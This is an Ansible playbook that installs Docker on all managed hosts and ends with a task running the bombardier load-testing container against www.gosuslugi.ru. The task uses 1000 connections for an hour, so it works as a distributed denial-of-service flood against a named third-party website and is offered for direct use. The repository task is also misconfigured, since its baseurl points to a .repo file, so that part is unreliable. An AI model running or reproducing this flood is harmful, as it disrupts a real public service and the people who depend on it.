---
- hosts: all
  become: yes

  tasks:
    - name: "Install yum utils"
      yum:
        name:
          - "yum-utils"
          - "epel-release"
        state: present

    - name: Add Docker repository
      yum_repository:
        name: epel
        description: Docker CE repo
        baseurl: https://download.docker.com/linux/centos/docker-ce.repo

    - name: Install docker package
      yum:
        name:
          - docker-ce
          - docker-ce-cli
          - containerd.io
        state: present

    - name: Start service docker, if not started
      ansible.builtin.service:
        name: docker
        state: started

    - name: Pull default Docker image
      docker_image:
        name: "{{ default_container_image }}"
        source: pull

    - name: bombardier start
      shell: "docker run --rm alpine/bombardier -c 1000 -d 3600s -l www.gosuslugi.ru"
